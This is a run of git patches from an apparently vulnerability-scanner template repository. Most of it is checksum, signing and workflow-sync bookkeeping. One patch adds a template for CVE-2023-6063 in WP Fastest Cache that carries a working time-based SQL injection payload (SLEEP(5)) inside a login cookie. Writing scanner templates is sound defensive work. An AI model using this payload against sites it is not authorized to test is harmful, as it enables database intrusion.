http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/UCMDB/ucmdb-default-login.yaml:627864b8eb2c47b7c717e1ed1800ba39eee5410c @@ -7321,7 +7327,7 @@ http/vulnerabilities/wanhu/wanhu-download-ftp-file-read.yaml:e02472b72f5d9878047 http/vulnerabilities/wanhu/wanhu-download-old-file-read.yaml:3cff53af82accffec2e351d7df60e5e4e35db74a http/vulnerabilities/wanhu/wanhu-oa-fileupload-controller-arbitrary-file-upload.yaml:e738eece341969c65a3381e85af0d15fcb6a1e7e http/vulnerabilities/wanhu/wanhu-teleconferenceservice-xxe.yaml:33ca0fa4ce60c95c2ab30e6e1c56e92c5d7e110b -http/vulnerabilities/wanhu/wanhuoa-downloadservlet-lfi.yaml:c5c65074ae942c2644283b786472ae62b694b765 +http/vulnerabilities/wanhu/wanhuoa-downloadservlet-lfi.yaml:7cd602aeb1529a05489575ca561de7a603a1ed43 http/vulnerabilities/wanhu/wanhuoa-officeserverservlet-file-upload.yaml:9959113bb4c48bfdbf29d441d778dd999cabb6c0 http/vulnerabilities/wanhu/wanhuoa-smartupload-file-upload.yaml:13ac607edb70a7613ae0bdac7ee906d6f09317b7 http/vulnerabilities/weaver/ecology/ecology-arbitrary-file-upload.yaml:0106b0bdf29e6f3b66643457a2ddba14d80d9053 @@ -7749,7 +7755,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:188141845761f78d1ccabc26184b55f469dcaa40 +templates-checksum.txt:f5bf1455d823d95ad6d69444add1f3063df79736 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From edf37b4cd2c5cc897bf53264a5d8262b3df76e8e Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 14 Jan 2024 13:18:10 +0000 Subject: [PATCH 034/285] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 6bb81160f6..fbfde3d144 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -48,6 +48,7 @@ on: - 'http/cves/2023/CVE-2023-50917.yaml' - 'http/misconfiguration/cookies-without-httponly-secure.yaml' - 'http/vulnerabilities/wanhu/wanhuoa-downloadservlet-lfi.yaml' + - 'http/cves/2023/CVE-2023-7028.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 97d514cb1f7a80c9891977981cbf7e3e412f10eb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 14 Jan 2024 13:19:27 +0000 Subject: [PATCH 035/285] Auto Template Signing [Sun Jan 14 13:19:27 UTC 2024] :robot: --- http/cves/2023/CVE-2023-7028.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-7028.yaml b/http/cves/2023/CVE-2023-7028.yaml index 0849003a55..b555b28ec3 100644 --- a/http/cves/2023/CVE-2023-7028.yaml +++ b/http/cves/2023/CVE-2023-7028.yaml @@ -70,3 +70,4 @@ http: - type: dsl dsl: - username +# digest: 490a004630440220515f1765a745e19a7d1145d139ddb604c88bd7daa2859c50a84507f5f14465b6022076dd954c5cddf80992c5fb3382924d2b4b8a0dfe569f2dcb928ed3e0d2c97e3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 33097c702f63de52be586c6bb681ac0f31fcd65c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 14 Jan 2024 18:50:23 +0530 Subject: [PATCH 036/285] Create CVE-2023-6063.yaml --- http/cves/2023/CVE-2023-6063.yaml | 58 +++++++++++++++++++++++++++++++ 1 file changed, 58 insertions(+) create mode 100644 http/cves/2023/CVE-2023-6063.yaml diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml new file mode 100644 index 0000000000..ee44428798 --- /dev/null +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -0,0 +1,58 @@ +id: CVE-2023-6063 + +info: + name: WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection + author: DhiyaneshDK + severity: high + description: | + The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users. + remediation: Fixed in 1.2.2 + reference: + - https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/ + - https://wordpress.org/plugins/wp-fastest-cache/ + - https://github.com/motikan2010/CVE-2023-6063-PoC + - https://nvd.nist.gov/vuln/detail/CVE-2023-6063 + - https://wpscan.com/vulnerability/30a74105-8ade-4198-abe2-1c6f2967443e/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-6063 + cwe-id: CWE-89 + epss-score: 0.00159 + epss-percentile: 0.52296 + cpe: cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:* + metadata: + vendor: wpfastestcache + product: wp_fastest_cache + framework: wordpress + publicwww-query: "/wp-content/plugins/wp-fastest-cache/" + tags: cve,cve2023,wp-fastest-cache,wpscan,wordpress,wp-plugin + +flow: http(1) && http(2) + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "WP Fastest Cache")' + condition: and + internal: true + + - method: GET + path: + - "{{BaseURL}}/wp-login.php" + headers: + Cookie: wordpress_logged_in=" AND (SELECT 5025 FROM (SELECT(SLEEP(5)))NkcI) AND "tqKU"="tqKU + + matchers: + - type: dsl + dsl: + - 'duration>=5' + - 'status_code == 200' + - 'contains(body, "wp-admin")' + condition: and From 10b45e0050f584827857e5aed68ed32c8d6cc198 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 14 Jan 2024 13:36:48 +0000 Subject: [PATCH 037/285] Auto Generated New Template Addition List [Sun Jan 14 13:36:48 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c660b2544f..872f4d4292 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ http/cves/2023/CVE-2023-46574.yaml http/cves/2023/CVE-2023-50917.yaml http/cves/2023/CVE-2023-50968.yaml http/cves/2023/CVE-2023-51467.yaml +http/cves/2023/CVE-2023-6063.yaml http/cves/2023/CVE-2023-6379.yaml http/cves/2023/CVE-2023-6623.yaml http/cves/2023/CVE-2023-7028.yaml From acda0414d22ddbeaa68f3cc35575a8cdf6982647 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 14 Jan 2024 13:36:59 +0000 Subject: [PATCH 038/285] Auto Generated Templates Checksum [Sun Jan 14 13:36:59 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3d2e5ff158..1d33a63d2f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -28,8 +28,8 @@ config/osint.yml:846ae0c6f62f669b094a5e1dd47843fd5ff32395 config/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196 config/recommended.yml:d95863b9d5d9e86430e1560668df428a6fa96c2e contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:f9bd7e2d4a4b665102f317f8f817f6f784d6f848 -cves.json-checksum.txt:33279154a564aeefb5bc61ab0f37de72d0c74d6c +cves.json:4f05e877f70474e788768c949ccca824bfb9654d +cves.json-checksum.txt:f97de5adfcde9d9450bbc67ac98d18ee9dfc061f dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 @@ -2924,11 +2924,12 @@ http/cves/2023/CVE-2023-6018.yaml:3d6e4d1d3f2bc2452eaca0739cb4ec0becb8f56f http/cves/2023/CVE-2023-6020.yaml:c58ef1886577020dc7824af970c34e1c41052726 http/cves/2023/CVE-2023-6021.yaml:4e8995b432c27997072d7b667974ceb6a634e7b7 http/cves/2023/CVE-2023-6038.yaml:73370dcdb906b3ad54800bacf2119b8103c5ed79 +http/cves/2023/CVE-2023-6063.yaml:37e88595464e39a552595d057a014431e167c8c3 http/cves/2023/CVE-2023-6379.yaml:7005bdf0269c634bb599e6be3de8bc565b18b860 http/cves/2023/CVE-2023-6380.yaml:15f74e719b8448c91780cbe080fb867d34f08788 http/cves/2023/CVE-2023-6553.yaml:9ed9fbd3c2b73e9bf9b3bc50369f7df7d25e1cc0 http/cves/2023/CVE-2023-6623.yaml:88b7ee2c84d5e2114c51c7f960270fbe90162ca5 -http/cves/2023/CVE-2023-7028.yaml:6f09d4549ec0829f73a06e6e18aff2f7632ab96e +http/cves/2023/CVE-2023-7028.yaml:5ac071c7dd61ccd480c39005036f4e0fadd069c4 http/cves/2024/CVE-2024-0352.yaml:a5dc7e2fad942074c79ae2b4d7186f6598edfd05 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/UCMDB/ucmdb-default-login.yaml:627864b8eb2c47b7c717e1ed1800ba39eee5410c @@ -7755,7 +7756,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:f5bf1455d823d95ad6d69444add1f3063df79736 +templates-checksum.txt:d0d9f919b33a14bbfa9bc98298e3ec13374db702 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b47d83a909ace3032e257dc4d2d5e37b10b0886c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 14 Jan 2024 13:37:22 +0000 Subject: [PATCH 039/285] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index fbfde3d144..9009344e77 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -49,6 +49,7 @@ on: - 'http/misconfiguration/cookies-without-httponly-secure.yaml' - 'http/vulnerabilities/wanhu/wanhuoa-downloadservlet-lfi.yaml' - 'http/cves/2023/CVE-2023-7028.yaml' + - 'http/cves/2023/CVE-2023-6063.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From b032dbe7040ee799e7c25c92db8d0641484bde35 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 14 Jan 2024 13:38:32 +0000 Subject: [PATCH 040/285] Auto Template Signing [Sun Jan 14 13:38:32 UTC 2024] :robot: --- http/cves/2023/CVE-2023-6063.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index ee44428798..d70b4a18b9 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -56,3 +56,4 @@ http: - 'status_code == 200' - 'contains(body, "wp-admin")' condition: and +# digest: 4a0a00473045022100c43724f50915795b56f442ffe09486af2947ed91adfa9b409ecf52353e7b297b02206c0625ebec62317e336368f28d1ad8c9b11a7f245e3d50e26532db80db957557:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b0a5d26eaecf9ebc944b8954426028599ede2ea7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 14 Jan 2024 13:49:27 +0000 Subject: [PATCH 041/285] TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: --- cloud/enum/azure-vm-cloud-enum.yaml | 1 + cloud/enum/azure-website-enum.yaml | 1 + cloud/enum/gcp-app-engine-enum.yaml | 1 + cloud/enum/gcp-bucket-enum.yaml | 1 + cloud/enum/gcp-firebase-app-enum.yaml | 1 + cloud/enum/gcp-firebase-rtdb-enum.yaml | 1 + code/cves/2023/CVE-2023-49105.yaml | 8 ++++---- headless/cves/2018/CVE-2018-25031.yaml | 3 +-- http/cves/2000/CVE-2000-0114.yaml | 2 +- http/cves/2001/CVE-2001-0537.yaml | 2 +- http/cves/2002/CVE-2002-1131.yaml | 2 +- http/cves/2004/CVE-2004-0519.yaml | 2 +- http/cves/2004/CVE-2004-1965.yaml | 2 +- http/cves/2005/CVE-2005-2428.yaml | 2 +- http/cves/2005/CVE-2005-3344.yaml | 2 +- http/cves/2005/CVE-2005-3634.yaml | 2 +- http/cves/2005/CVE-2005-4385.yaml | 2 +- http/cves/2006/CVE-2006-1681.yaml | 2 +- http/cves/2006/CVE-2006-2842.yaml | 4 ++-- http/cves/2007/CVE-2007-0885.yaml | 4 ++-- http/cves/2007/CVE-2007-4504.yaml | 2 +- http/cves/2007/CVE-2007-4556.yaml | 2 +- http/cves/2007/CVE-2007-5728.yaml | 2 +- http/cves/2008/CVE-2008-1059.yaml | 2 +- http/cves/2008/CVE-2008-1061.yaml | 4 ++-- http/cves/2008/CVE-2008-1547.yaml | 4 ++-- http/cves/2008/CVE-2008-2398.yaml | 2 +- http/cves/2008/CVE-2008-2650.yaml | 2 +- http/cves/2008/CVE-2008-4668.yaml | 2 +- http/cves/2008/CVE-2008-4764.yaml | 2 +- http/cves/2008/CVE-2008-5587.yaml | 2 +- http/cves/2008/CVE-2008-6080.yaml | 4 ++-- http/cves/2008/CVE-2008-6172.yaml | 2 +- http/cves/2008/CVE-2008-6222.yaml | 2 +- http/cves/2008/CVE-2008-6465.yaml | 2 +- http/cves/2008/CVE-2008-6668.yaml | 2 +- http/cves/2008/CVE-2008-6982.yaml | 2 +- http/cves/2008/CVE-2008-7269.yaml | 4 ++-- http/cves/2009/CVE-2009-0347.yaml | 4 ++-- http/cves/2009/CVE-2009-0545.yaml | 2 +- http/cves/2009/CVE-2009-0932.yaml | 2 +- http/cves/2009/CVE-2009-1151.yaml | 2 +- http/cves/2009/CVE-2009-1496.yaml | 2 +- http/cves/2009/CVE-2009-1558.yaml | 4 ++-- http/cves/2009/CVE-2009-1872.yaml | 2 +- http/cves/2009/CVE-2009-2015.yaml | 2 +- http/cves/2009/CVE-2009-2100.yaml | 4 ++-- http/cves/2009/CVE-2009-3053.yaml | 2 +- http/cves/2009/CVE-2009-3318.yaml | 2 +- http/cves/2009/CVE-2009-4202.yaml | 2 +- http/cves/2009/CVE-2009-4223.yaml | 2 +- http/cves/2009/CVE-2009-4679.yaml | 2 +- http/cves/2009/CVE-2009-5020.yaml | 2 +- http/cves/2009/CVE-2009-5114.yaml | 4 ++-- http/cves/2010/CVE-2010-0157.yaml | 2 +- http/cves/2010/CVE-2010-0219.yaml | 4 ++-- http/cves/2010/CVE-2010-0467.yaml | 4 ++-- http/cves/2010/CVE-2010-0696.yaml | 4 ++-- http/cves/2010/CVE-2010-0759.yaml | 2 +- http/cves/2010/CVE-2010-0942.yaml | 2 +- http/cves/2010/CVE-2010-0943.yaml | 2 +- http/cves/2010/CVE-2010-0944.yaml | 2 +- http/cves/2010/CVE-2010-0972.yaml | 2 +- http/cves/2010/CVE-2010-0982.yaml | 2 +- http/cves/2010/CVE-2010-0985.yaml | 2 +- http/cves/2010/CVE-2010-1056.yaml | 2 +- http/cves/2010/CVE-2010-1081.yaml | 2 +- http/cves/2010/CVE-2010-1217.yaml | 2 +- http/cves/2010/CVE-2010-1219.yaml | 2 +- http/cves/2010/CVE-2010-1302.yaml | 2 +- http/cves/2010/CVE-2010-1304.yaml | 2 +- http/cves/2010/CVE-2010-1305.yaml | 2 +- http/cves/2010/CVE-2010-1306.yaml | 2 +- http/cves/2010/CVE-2010-1307.yaml | 2 +- http/cves/2010/CVE-2010-1308.yaml | 2 +- http/cves/2010/CVE-2010-1312.yaml | 2 +- http/cves/2010/CVE-2010-1313.yaml | 2 +- http/cves/2010/CVE-2010-1314.yaml | 2 +- http/cves/2010/CVE-2010-1315.yaml | 2 +- http/cves/2010/CVE-2010-1340.yaml | 2 +- http/cves/2010/CVE-2010-1345.yaml | 2 +- http/cves/2010/CVE-2010-1352.yaml | 2 +- http/cves/2010/CVE-2010-1353.yaml | 2 +- http/cves/2010/CVE-2010-1354.yaml | 2 +- http/cves/2010/CVE-2010-1429.yaml | 2 +- http/cves/2010/CVE-2010-1461.yaml | 2 +- http/cves/2010/CVE-2010-1469.yaml | 2 +- http/cves/2010/CVE-2010-1470.yaml | 2 +- http/cves/2010/CVE-2010-1471.yaml | 2 +- http/cves/2010/CVE-2010-1472.yaml | 2 +- http/cves/2010/CVE-2010-1473.yaml | 2 +- http/cves/2010/CVE-2010-1474.yaml | 2 +- http/cves/2010/CVE-2010-1475.yaml | 2 +- http/cves/2010/CVE-2010-1476.yaml | 2 +- http/cves/2010/CVE-2010-1478.yaml | 2 +- http/cves/2010/CVE-2010-1491.yaml | 2 +- http/cves/2010/CVE-2010-1494.yaml | 2 +- http/cves/2010/CVE-2010-1495.yaml | 2 +- http/cves/2010/CVE-2010-1531.yaml | 2 +- http/cves/2010/CVE-2010-1532.yaml | 2 +- http/cves/2010/CVE-2010-1533.yaml | 2 +- http/cves/2010/CVE-2010-1534.yaml | 2 +- http/cves/2010/CVE-2010-1535.yaml | 2 +- http/cves/2010/CVE-2010-1540.yaml | 2 +- http/cves/2010/CVE-2010-1586.yaml | 2 +- http/cves/2010/CVE-2010-1601.yaml | 2 +- http/cves/2010/CVE-2010-1602.yaml | 2 +- http/cves/2010/CVE-2010-1603.yaml | 2 +- http/cves/2010/CVE-2010-1607.yaml | 2 +- http/cves/2010/CVE-2010-1653.yaml | 2 +- http/cves/2010/CVE-2010-1657.yaml | 2 +- http/cves/2010/CVE-2010-1658.yaml | 2 +- http/cves/2010/CVE-2010-1659.yaml | 2 +- http/cves/2010/CVE-2010-1714.yaml | 2 +- http/cves/2010/CVE-2010-1715.yaml | 2 +- http/cves/2010/CVE-2010-1717.yaml | 2 +- http/cves/2010/CVE-2010-1718.yaml | 2 +- http/cves/2010/CVE-2010-1719.yaml | 2 +- http/cves/2010/CVE-2010-1722.yaml | 2 +- http/cves/2010/CVE-2010-1723.yaml | 2 +- http/cves/2010/CVE-2010-1858.yaml | 2 +- http/cves/2010/CVE-2010-1870.yaml | 2 +- http/cves/2010/CVE-2010-1875.yaml | 2 +- http/cves/2010/CVE-2010-1878.yaml | 2 +- http/cves/2010/CVE-2010-1952.yaml | 2 +- http/cves/2010/CVE-2010-1953.yaml | 2 +- http/cves/2010/CVE-2010-1954.yaml | 2 +- http/cves/2010/CVE-2010-1955.yaml | 2 +- http/cves/2010/CVE-2010-1956.yaml | 2 +- http/cves/2010/CVE-2010-1957.yaml | 2 +- http/cves/2010/CVE-2010-1977.yaml | 2 +- http/cves/2010/CVE-2010-1979.yaml | 2 +- http/cves/2010/CVE-2010-1980.yaml | 2 +- http/cves/2010/CVE-2010-1981.yaml | 2 +- http/cves/2010/CVE-2010-1982.yaml | 2 +- http/cves/2010/CVE-2010-1983.yaml | 2 +- http/cves/2010/CVE-2010-2033.yaml | 2 +- http/cves/2010/CVE-2010-2034.yaml | 2 +- http/cves/2010/CVE-2010-2035.yaml | 2 +- http/cves/2010/CVE-2010-2036.yaml | 2 +- http/cves/2010/CVE-2010-2037.yaml | 2 +- http/cves/2010/CVE-2010-2045.yaml | 2 +- http/cves/2010/CVE-2010-2050.yaml | 2 +- http/cves/2010/CVE-2010-2122.yaml | 2 +- http/cves/2010/CVE-2010-2128.yaml | 2 +- http/cves/2010/CVE-2010-2259.yaml | 2 +- http/cves/2010/CVE-2010-2307.yaml | 4 ++-- http/cves/2010/CVE-2010-2507.yaml | 2 +- http/cves/2010/CVE-2010-2680.yaml | 2 +- http/cves/2010/CVE-2010-2682.yaml | 2 +- http/cves/2010/CVE-2010-2857.yaml | 2 +- http/cves/2010/CVE-2010-2861.yaml | 4 ++-- http/cves/2010/CVE-2010-2918.yaml | 2 +- http/cves/2010/CVE-2010-2920.yaml | 2 +- http/cves/2010/CVE-2010-3203.yaml | 2 +- http/cves/2010/CVE-2010-3426.yaml | 2 +- http/cves/2010/CVE-2010-4231.yaml | 2 +- http/cves/2010/CVE-2010-4239.yaml | 2 +- http/cves/2010/CVE-2010-4282.yaml | 2 +- http/cves/2010/CVE-2010-4617.yaml | 2 +- http/cves/2010/CVE-2010-4719.yaml | 2 +- http/cves/2010/CVE-2010-4769.yaml | 4 ++-- http/cves/2010/CVE-2010-4977.yaml | 2 +- http/cves/2010/CVE-2010-5028.yaml | 2 +- http/cves/2010/CVE-2010-5278.yaml | 4 ++-- http/cves/2010/CVE-2010-5286.yaml | 4 ++-- http/cves/2011/CVE-2011-0049.yaml | 2 +- http/cves/2011/CVE-2011-1669.yaml | 2 +- http/cves/2011/CVE-2011-2744.yaml | 2 +- http/cves/2011/CVE-2011-2780.yaml | 2 +- http/cves/2011/CVE-2011-3315.yaml | 4 ++-- http/cves/2011/CVE-2011-4336.yaml | 2 +- http/cves/2011/CVE-2011-4618.yaml | 2 +- http/cves/2011/CVE-2011-4624.yaml | 2 +- http/cves/2011/CVE-2011-4804.yaml | 2 +- http/cves/2011/CVE-2011-4926.yaml | 2 +- http/cves/2011/CVE-2011-5106.yaml | 2 +- http/cves/2011/CVE-2011-5107.yaml | 2 +- http/cves/2011/CVE-2011-5179.yaml | 2 +- http/cves/2011/CVE-2011-5181.yaml | 2 +- http/cves/2011/CVE-2011-5252.yaml | 2 +- http/cves/2011/CVE-2011-5265.yaml | 2 +- http/cves/2012/CVE-2012-0392.yaml | 2 +- http/cves/2012/CVE-2012-0394.yaml | 2 +- http/cves/2012/CVE-2012-0896.yaml | 2 +- http/cves/2012/CVE-2012-0901.yaml | 2 +- http/cves/2012/CVE-2012-0981.yaml | 2 +- http/cves/2012/CVE-2012-0991.yaml | 2 +- http/cves/2012/CVE-2012-0996.yaml | 2 +- http/cves/2012/CVE-2012-1226.yaml | 2 +- http/cves/2012/CVE-2012-1823.yaml | 2 +- http/cves/2012/CVE-2012-1835.yaml | 2 +- http/cves/2012/CVE-2012-2371.yaml | 2 +- http/cves/2012/CVE-2012-3153.yaml | 4 ++-- http/cves/2012/CVE-2012-4032.yaml | 2 +- http/cves/2012/CVE-2012-4242.yaml | 2 +- http/cves/2012/CVE-2012-4253.yaml | 2 +- http/cves/2012/CVE-2012-4273.yaml | 2 +- http/cves/2012/CVE-2012-4547.yaml | 2 +- http/cves/2012/CVE-2012-4768.yaml | 2 +- http/cves/2012/CVE-2012-4878.yaml | 2 +- http/cves/2012/CVE-2012-4889.yaml | 2 +- http/cves/2012/CVE-2012-4940.yaml | 2 +- http/cves/2012/CVE-2012-4982.yaml | 4 ++-- http/cves/2012/CVE-2012-5321.yaml | 4 ++-- http/cves/2012/CVE-2012-5913.yaml | 2 +- http/cves/2012/CVE-2012-6499.yaml | 2 +- http/cves/2013/CVE-2013-1965.yaml | 2 +- http/cves/2013/CVE-2013-2248.yaml | 2 +- http/cves/2013/CVE-2013-2251.yaml | 2 +- http/cves/2013/CVE-2013-2287.yaml | 2 +- http/cves/2013/CVE-2013-2621.yaml | 2 +- http/cves/2013/CVE-2013-3526.yaml | 2 +- http/cves/2013/CVE-2013-3827.yaml | 2 +- http/cves/2013/CVE-2013-4117.yaml | 2 +- http/cves/2013/CVE-2013-4625.yaml | 2 +- http/cves/2013/CVE-2013-5528.yaml | 4 ++-- http/cves/2013/CVE-2013-5979.yaml | 4 ++-- http/cves/2013/CVE-2013-6281.yaml | 2 +- http/cves/2013/CVE-2013-7091.yaml | 2 +- http/cves/2013/CVE-2013-7240.yaml | 4 ++-- http/cves/2013/CVE-2013-7285.yaml | 4 ++-- http/cves/2014/CVE-2014-10037.yaml | 2 +- http/cves/2014/CVE-2014-1203.yaml | 2 +- http/cves/2014/CVE-2014-2321.yaml | 2 +- http/cves/2014/CVE-2014-2323.yaml | 2 +- http/cves/2014/CVE-2014-2383.yaml | 2 +- http/cves/2014/CVE-2014-2908.yaml | 2 +- http/cves/2014/CVE-2014-2962.yaml | 2 +- http/cves/2014/CVE-2014-3120.yaml | 2 +- http/cves/2014/CVE-2014-3206.yaml | 4 ++-- http/cves/2014/CVE-2014-3704.yaml | 4 ++-- http/cves/2014/CVE-2014-3744.yaml | 2 +- http/cves/2014/CVE-2014-4210.yaml | 2 +- http/cves/2014/CVE-2014-4513.yaml | 2 +- http/cves/2014/CVE-2014-4535.yaml | 2 +- http/cves/2014/CVE-2014-4536.yaml | 2 +- http/cves/2014/CVE-2014-4539.yaml | 2 +- http/cves/2014/CVE-2014-4544.yaml | 2 +- http/cves/2014/CVE-2014-4550.yaml | 2 +- http/cves/2014/CVE-2014-4558.yaml | 2 +- http/cves/2014/CVE-2014-4561.yaml | 2 +- http/cves/2014/CVE-2014-4592.yaml | 2 +- http/cves/2014/CVE-2014-4940.yaml | 2 +- http/cves/2014/CVE-2014-4942.yaml | 2 +- http/cves/2014/CVE-2014-5111.yaml | 2 +- http/cves/2014/CVE-2014-5258.yaml | 2 +- http/cves/2014/CVE-2014-5368.yaml | 2 +- http/cves/2014/CVE-2014-6287.yaml | 2 +- http/cves/2014/CVE-2014-6308.yaml | 2 +- http/cves/2014/CVE-2014-8676.yaml | 2 +- http/cves/2014/CVE-2014-8682.yaml | 2 +- http/cves/2014/CVE-2014-8799.yaml | 2 +- http/cves/2014/CVE-2014-9094.yaml | 2 +- http/cves/2014/CVE-2014-9119.yaml | 2 +- http/cves/2014/CVE-2014-9180.yaml | 2 +- http/cves/2014/CVE-2014-9444.yaml | 2 +- http/cves/2014/CVE-2014-9606.yaml | 2 +- http/cves/2014/CVE-2014-9607.yaml | 2 +- http/cves/2014/CVE-2014-9608.yaml | 2 +- http/cves/2014/CVE-2014-9609.yaml | 2 +- http/cves/2014/CVE-2014-9614.yaml | 2 +- http/cves/2014/CVE-2014-9615.yaml | 2 +- http/cves/2014/CVE-2014-9617.yaml | 2 +- http/cves/2014/CVE-2014-9618.yaml | 2 +- http/cves/2015/CVE-2015-0554.yaml | 4 ++-- http/cves/2015/CVE-2015-1000005.yaml | 2 +- http/cves/2015/CVE-2015-1000010.yaml | 2 +- http/cves/2015/CVE-2015-1000012.yaml | 2 +- http/cves/2015/CVE-2015-1427.yaml | 2 +- http/cves/2015/CVE-2015-1503.yaml | 4 ++-- http/cves/2015/CVE-2015-1579.yaml | 2 +- http/cves/2015/CVE-2015-1880.yaml | 2 +- http/cves/2015/CVE-2015-2067.yaml | 4 ++-- http/cves/2015/CVE-2015-2068.yaml | 2 +- http/cves/2015/CVE-2015-2080.yaml | 2 +- http/cves/2015/CVE-2015-2166.yaml | 2 +- http/cves/2015/CVE-2015-2196.yaml | 2 +- http/cves/2015/CVE-2015-2755.yaml | 2 +- http/cves/2015/CVE-2015-2794.yaml | 9 ++++++--- http/cves/2015/CVE-2015-2807.yaml | 2 +- http/cves/2015/CVE-2015-2863.yaml | 2 +- http/cves/2015/CVE-2015-2996.yaml | 2 +- http/cves/2015/CVE-2015-3035.yaml | 2 +- http/cves/2015/CVE-2015-3224.yaml | 4 ++-- http/cves/2015/CVE-2015-3337.yaml | 2 +- http/cves/2015/CVE-2015-3648.yaml | 2 +- http/cves/2015/CVE-2015-3897.yaml | 2 +- http/cves/2015/CVE-2015-4050.yaml | 2 +- http/cves/2015/CVE-2015-4062.yaml | 4 ++-- http/cves/2015/CVE-2015-4063.yaml | 2 +- http/cves/2015/CVE-2015-4074.yaml | 2 +- http/cves/2015/CVE-2015-4127.yaml | 2 +- http/cves/2015/CVE-2015-4414.yaml | 4 ++-- http/cves/2015/CVE-2015-4632.yaml | 2 +- http/cves/2015/CVE-2015-4666.yaml | 2 +- http/cves/2015/CVE-2015-4668.yaml | 2 +- http/cves/2015/CVE-2015-4694.yaml | 2 +- http/cves/2015/CVE-2015-5354.yaml | 2 +- http/cves/2015/CVE-2015-5461.yaml | 2 +- http/cves/2015/CVE-2015-5469.yaml | 2 +- http/cves/2015/CVE-2015-5471.yaml | 2 +- http/cves/2015/CVE-2015-5531.yaml | 2 +- http/cves/2015/CVE-2015-5688.yaml | 2 +- http/cves/2015/CVE-2015-6477.yaml | 2 +- http/cves/2015/CVE-2015-6544.yaml | 2 +- http/cves/2015/CVE-2015-6920.yaml | 2 +- http/cves/2015/CVE-2015-7245.yaml | 2 +- http/cves/2015/CVE-2015-7377.yaml | 2 +- http/cves/2015/CVE-2015-7450.yaml | 2 +- http/cves/2015/CVE-2015-7780.yaml | 2 +- http/cves/2015/CVE-2015-7823.yaml | 2 +- http/cves/2015/CVE-2015-8349.yaml | 2 +- http/cves/2015/CVE-2015-8399.yaml | 2 +- http/cves/2015/CVE-2015-8813.yaml | 2 +- 